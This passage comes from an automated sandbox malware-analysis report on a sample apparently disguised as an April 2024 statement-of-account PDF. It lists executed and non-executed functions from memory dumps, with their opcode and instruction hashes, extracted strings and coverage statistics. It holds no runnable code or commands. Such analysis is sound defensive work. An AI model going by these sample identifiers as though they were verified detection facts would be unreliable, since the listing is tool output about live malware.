                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff486edeb9af520e9e1fb764179bb8216229f3dbf384a77d4ef5da60c30bc609
                                  • Instruction ID: d027866afb4160d975024b4d857adf576f1fad4fb460146181f65a9dbf41828c
                                  • Opcode Fuzzy Hash: ff486edeb9af520e9e1fb764179bb8216229f3dbf384a77d4ef5da60c30bc609
                                  • Instruction Fuzzy Hash: 1B210472544240DFDF04DF28D9C8B2ABF65FB94324F20C56DD90A5B366C33AD846C662
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E904B4 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280595142.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_e90000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 85aabf61af798f5b17dac9ee122734a68750d978bff9b348f53de2c6a3bf7e1e
                                  • Instruction ID: adec5af7d284621d21566b76aae048a94cbcfe65b630a8949441862e56b9876b
                                  • Opcode Fuzzy Hash: 85aabf61af798f5b17dac9ee122734a68750d978bff9b348f53de2c6a3bf7e1e
                                  • Instruction Fuzzy Hash: CA31E2B0D01218DFDB24DF99C589BDEBBF5EB48314F64901AE408BB340D7B59885CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B6CE8 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 317b867ea99198d711485222b04f145a5631a8f4795311cc6494fc160984cbc7
                                  • Instruction ID: 57e4fe709e7807cbdbced10c78fe708c57e2647f9307665c9ccf8676400cc830
                                  • Opcode Fuzzy Hash: 317b867ea99198d711485222b04f145a5631a8f4795311cc6494fc160984cbc7
                                  • Instruction Fuzzy Hash: 5921A231F00119DBCF94DA69F9546EDBBBAEB84310F249429E405E7354DB35ED818B84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B3430 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b608c1be1196df0cb7f6bd805f1cc80c21e56d0cc7432f16fda7029fe481718d
                                  • Instruction ID: 13b1b883986828cd74a06f8907fbbe1504c6207ede2d5eec35c2f29a31dab16e
                                  • Opcode Fuzzy Hash: b608c1be1196df0cb7f6bd805f1cc80c21e56d0cc7432f16fda7029fe481718d
                                  • Instruction Fuzzy Hash: 2C118E71F002289BCB65DF68D9805DEFBB5EB89310F1095AAE009FB304EB359985CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BF919 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4968a68c5898bc533f7beefce30c1b3a369625504cfcd69ae5587814c18fb0a6
                                  • Instruction ID: 5f89fe966d699b147c7ada48dd52b8061fa948a81f472b3ee8a1bdacd0f8a3aa
                                  • Opcode Fuzzy Hash: 4968a68c5898bc533f7beefce30c1b3a369625504cfcd69ae5587814c18fb0a6
                                  • Instruction Fuzzy Hash: B9110060B20224ABEF60366DDC1036F248ECB85760F20482BE40AD73F6C82CCC8243E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BF928 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca4b2785b51185d80dcdd9e35ef6da317e079d13cf81839134e088d785165fba
                                  • Instruction ID: 4c64cd7258ece1058bacba056d2f422b1889242c5aa161070b635ab9b5779dfa
                                  • Opcode Fuzzy Hash: ca4b2785b51185d80dcdd9e35ef6da317e079d13cf81839134e088d785165fba
                                  • Instruction Fuzzy Hash: FF01B160B60228ABEF64356DDD5076F208ECBC5B60F20482AE40AD73F5C968CC8143E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B3F90 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41330b23ddbce327805963da9c1d11f5295989eb91a44f41e661c73daefcc244
                                  • Instruction ID: 831e7372edb3920a73dd803abc3dae6e477ed6cd90337d1c753e1bc393462b59
                                  • Opcode Fuzzy Hash: 41330b23ddbce327805963da9c1d11f5295989eb91a44f41e661c73daefcc244
                                  • Instruction Fuzzy Hash: ED118E31B141288BDB94DA68D8146EF77FAEBC8250F004439D406E7358EE69DC428BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B41C9 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35df1f2cb916a9a33279d14e674dff2f387db71fa55b23dff92775a22abfbb1d
                                  • Instruction ID: fa9ba248f5b80b944aaa74d641f037a9c5808d279f3428e6622a5016dc88e3b6
                                  • Opcode Fuzzy Hash: 35df1f2cb916a9a33279d14e674dff2f387db71fa55b23dff92775a22abfbb1d
                                  • Instruction Fuzzy Hash: 25012838B101108FDB6596BCD8517AAE7EADBC9710F20883BE50AC7359EE38DD428350
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B3F7F Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1ee4d32c0018c26aea2074952cfcd374494692063fff1887cbc240a0140ea68
                                  • Instruction ID: e6ea38d06b36c036d9ee98ca77b3cc6404798c0c56d57ce27ad4e6fce8eb4d1a
                                  • Opcode Fuzzy Hash: a1ee4d32c0018c26aea2074952cfcd374494692063fff1887cbc240a0140ea68
                                  • Instruction Fuzzy Hash: 93019E31B200259BDFA49E78D8146EBB3FAEFC8300F14453AD40AE7358EE24D9458BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B3C4B Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9dcce3bf50bb95e2294c0aa061eb47557d95fee6c285ec5a3b850a8f334f663e
                                  • Instruction ID: e34623222e3bdcc5ad2a91d93be8f46c85c000afe85aeb96b077e1186f27235d
                                  • Opcode Fuzzy Hash: 9dcce3bf50bb95e2294c0aa061eb47557d95fee6c285ec5a3b850a8f334f663e
                                  • Instruction Fuzzy Hash: 6B21A2B5D01619AFCB00DF9AD984ADEFBB4FF49310F10852AE518B7740C378A554CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BF15A Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9846c2b88d8cb2cf006d0be2d964b7e280a9b790e3c898174b648a57d0dc075b
                                  • Instruction ID: 64567b872721a51cad73e722f5de3fe9ddc422373aea59b1e6de4eee7ae9be2f
                                  • Opcode Fuzzy Hash: 9846c2b88d8cb2cf006d0be2d964b7e280a9b790e3c898174b648a57d0dc075b
                                  • Instruction Fuzzy Hash: 66012675B001118FCB669A7CDC547AE67EACBC9620F188C2AF10AC7366DE38CC434384
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C9D207 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                  • Instruction ID: 0cce8e73b35542fd2fba63b2eb54740b859d5543be415efa2b117d2997ebb417
                                  • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                  • Instruction Fuzzy Hash: EE11BF76504684CFDB12CF14D5C8B16FF61FB84324F24C6AAD84A5B656C33AD90ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C9D3B7 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 0974eb103fe28dc230f9b441134cfcfa8915d3d850ea37abc2353a9f97b76a06
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: E8119D75504280DFDB06CF14D5C8B15BFA2FB84314F24C6AAD84A4B656C33AE94ACFA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BA2CB Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e966cbc46685ade6b0f81b41226d4b59c1e262ea0d8b7a3af615b4b97e047025
                                  • Instruction ID: fe2360da0743f30b2f7e02afbf077a142a1eac1ae3741c29b4f5c6c5dcfbeb74
                                  • Opcode Fuzzy Hash: e966cbc46685ade6b0f81b41226d4b59c1e262ea0d8b7a3af615b4b97e047025
                                  • Instruction Fuzzy Hash: 8E01D430B001509FDBA5AAB8E9517AE6BE5EB85710F14983AE00ACB354EF25DC428380
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B3C50 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f93f6d5747029061993b525d10a988ea232753d69a60d649f64ef519712acf51
                                  • Instruction ID: 36b47a891917dadfb071e7f43a36ec4b90f64a3b02ed25e16ae780a4f8e39404
                                  • Opcode Fuzzy Hash: f93f6d5747029061993b525d10a988ea232753d69a60d649f64ef519712acf51
                                  • Instruction Fuzzy Hash: 2211A2B5D01259AFCB00DF9AD984ADEFBB4FB49310F50812AE518B7340C374A554CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C9D127 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction ID: 5892f95f6c93f26df0693b5c8b906e56df543bb9a1c5eafb22e04cfa4cd42965
                                  • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction Fuzzy Hash: CA11D076504280CFCB01CF14D5C4B19BF62FB44324F24C6ADD84A4B662C33AD85ACB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B41D8 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d0b2877e86af04fec3eec217ee455cc740a620b562230adcb85486a993cf3a1
                                  • Instruction ID: 9084ce187e70b88cc125330db9556dafb2b52895b32299a3d347b73a922f392d
                                  • Opcode Fuzzy Hash: 6d0b2877e86af04fec3eec217ee455cc740a620b562230adcb85486a993cf3a1
                                  • Instruction Fuzzy Hash: 7F01AD35B100209BDB6595ADE855BABA6DACBC9720F20843AE60EC7349EE75DC428390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BF168 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3df2a951ad6e049f33764d9f973e366e1b64b78e1f7213038b5c34f7d786d956
                                  • Instruction ID: 5801bafca5db48492cc40c704ae494494a8c2c40be6bd9a1204cc4e6d8f2948d
                                  • Opcode Fuzzy Hash: 3df2a951ad6e049f33764d9f973e366e1b64b78e1f7213038b5c34f7d786d956
                                  • Instruction Fuzzy Hash: 3D01DC75B100118BCBA99A2DEC50BAEA7EADBC9620F148839F10AC7360EE65DC424384
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BA2D8 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77585e0ed8fd9f65de77aea00887db7a0318677abc9cd5691120554f1671a64c
                                  • Instruction ID: 2f33aa675e195f923e4c6d425f4215cb1d3d0ba1243ea5fd197f3d97a8f1b07c
                                  • Opcode Fuzzy Hash: 77585e0ed8fd9f65de77aea00887db7a0318677abc9cd5691120554f1671a64c
                                  • Instruction Fuzzy Hash: 43018130B105149BCB64EABCE954BAE77DADB89710F109438F10AC7354EF26EC428784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BC783 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b15d025389c1ae80b873ee8ddc66a75d05d8bc08a4075b4457d4f7a840244900
                                  • Instruction ID: a58623c368b0ce5abf2607bb491bdbd525b98f372525b64b61aef92fed6812cd
                                  • Opcode Fuzzy Hash: b15d025389c1ae80b873ee8ddc66a75d05d8bc08a4075b4457d4f7a840244900
                                  • Instruction Fuzzy Hash: 9E017631E10224EBDB14AA74F840ADEB729FB85310F00447AE505EB345EB35AA448BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BC790 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 972067a1f2884c94dfe9d0dd04b217a4fa8a11b897bda51c974f44177db3afaf
                                  • Instruction ID: 379e9e513e7cb69a56d0a3641e6712dbe0bedb62b02391e6b7bda68ca5c0feb4
                                  • Opcode Fuzzy Hash: 972067a1f2884c94dfe9d0dd04b217a4fa8a11b897bda51c974f44177db3afaf
                                  • Instruction Fuzzy Hash: CE01F431F20228DBDB14AA69E840ADEB779FB85314F004439E905E7345DB71A9418BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BFF68 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe02d9de06b4c1976c1229c6b55c4a70ebe7ef70b450b28b40f01b86362b3117
                                  • Instruction ID: e214826630c0e50beb7830fea1b4f561b96bd874a5ead385945f1b1962bb5719
                                  • Opcode Fuzzy Hash: fe02d9de06b4c1976c1229c6b55c4a70ebe7ef70b450b28b40f01b86362b3117
                                  • Instruction Fuzzy Hash: 5FF03075E10718EF8B34CFA9D84049ABBF9EF8D610B00856AE455D3710D731E958CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B6448 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92d0c9a131f4565255b2fc66ca42e8914f0b0b001e965c01e82abfa3d7b80039
                                  • Instruction ID: 143cf1856b8eb00fff4fa2e639874a8fbcbe2dad29453c3c8d299014bfe74d1c
                                  • Opcode Fuzzy Hash: 92d0c9a131f4565255b2fc66ca42e8914f0b0b001e965c01e82abfa3d7b80039
                                  • Instruction Fuzzy Hash: 3CE0D871D1D5889BDF50CBB4DBA13E93B749B42118F2099E6C448DB302D17ACB41C350
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B6458 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                  • Instruction ID: a9cf0b319e00d0271c63ebc251f60981ad8ccbda15bea7edee962be75b936571
                                  • Opcode Fuzzy Hash: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                  • Instruction Fuzzy Hash: 67E0C2B1E11108EBDF50CEB4C9557AA77BCD701204F20D8A4D408C7301E172CA818380
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 066B7668 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3810553869
                                  • Opcode ID: c3611a36eb1af4d0d387f371d8eb65b69af45d79dcea254e83ae72327bf36c83
                                  • Instruction ID: 97bba64acaabb476e11f3743ab00dd9cf6b3dfda4f9591c1929cde739b94377e
                                  • Opcode Fuzzy Hash: c3611a36eb1af4d0d387f371d8eb65b69af45d79dcea254e83ae72327bf36c83
                                  • Instruction Fuzzy Hash: 78122B30E01219CFDB64DF65C994A9EBBB6FF88300F2095A9D409AB365DB349D85CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BA8F8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: c0f10606ecaa5f7329c03444935480a9348dde47c3c20fc969052a304886c13f
                                  • Instruction ID: 9b4bbec75e7ec768a4bada9d02c89958c80f54a9ad8bbe085c1b525f7e3f1fca
                                  • Opcode Fuzzy Hash: c0f10606ecaa5f7329c03444935480a9348dde47c3c20fc969052a304886c13f
                                  • Instruction Fuzzy Hash: 46917F30A10209DFDB64EFA4DA54BEEBBB6FF44300F209529E405A7395DB749C85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B7068 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 5149f042f37526f51367f442bfa4e02631b9c13042055851e72b05b75d6324fa
                                  • Instruction ID: 41e312f47b386122018007e970b87ba2fba2ab5ef14f3604627c15eb3e0a0a5e
                                  • Opcode Fuzzy Hash: 5149f042f37526f51367f442bfa4e02631b9c13042055851e72b05b75d6324fa
                                  • Instruction Fuzzy Hash: B2F14E30A00208CFDB54EB65D954AAEBBB7BFC4300F248469D4059B3A9DF35ED86DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B83A0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: a32dd9a04ee069219ad62e17d51732234a01127664cce4ff1eb8755d36e03822
                                  • Instruction ID: f91cbda609655d6611945972c21af0b59d3e9860e605fded5aa261653cc600ab
                                  • Opcode Fuzzy Hash: a32dd9a04ee069219ad62e17d51732234a01127664cce4ff1eb8755d36e03822
                                  • Instruction Fuzzy Hash: 68B14A30A00218CFDB54EF65C994AAEB7BAFF84314F24946DD4069B396DB74DC86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B87B8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq$$jq$$jq
                                  • API String ID: 0-2974078839
                                  • Opcode ID: 4cf93e6a65d81d9952bd5b47856d5bf519c0ca90d3998b20fb6c16c6524b7b85
                                  • Instruction ID: 6b91a551f7dc7cce06f1c4f607dc099c28b65e6489a27e63330f771d1d5400ec
                                  • Opcode Fuzzy Hash: 4cf93e6a65d81d9952bd5b47856d5bf519c0ca90d3998b20fb6c16c6524b7b85
                                  • Instruction Fuzzy Hash: 6F51A330B00201DFDB54EF28D954AAEB7AAFF85704F14956DE4059B3A9DB31EC85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BAC80 Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: da36455648f198a4b6d9f4e8122fc2f6dde778f31608c43d614055b8e92e2ef1
                                  • Instruction ID: b824ca7fbeff56b77a0f84e83a1bb316e8e5217c14a2e477d5c0e605eb1a698f
                                  • Opcode Fuzzy Hash: da36455648f198a4b6d9f4e8122fc2f6dde778f31608c43d614055b8e92e2ef1
                                  • Instruction Fuzzy Hash: 9B519E30E10204CFDBA5DBA4E984AEDB7B6FF85310F14956AE805A7355DB34EC82DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:171
                                  Total number of Limit Nodes:11
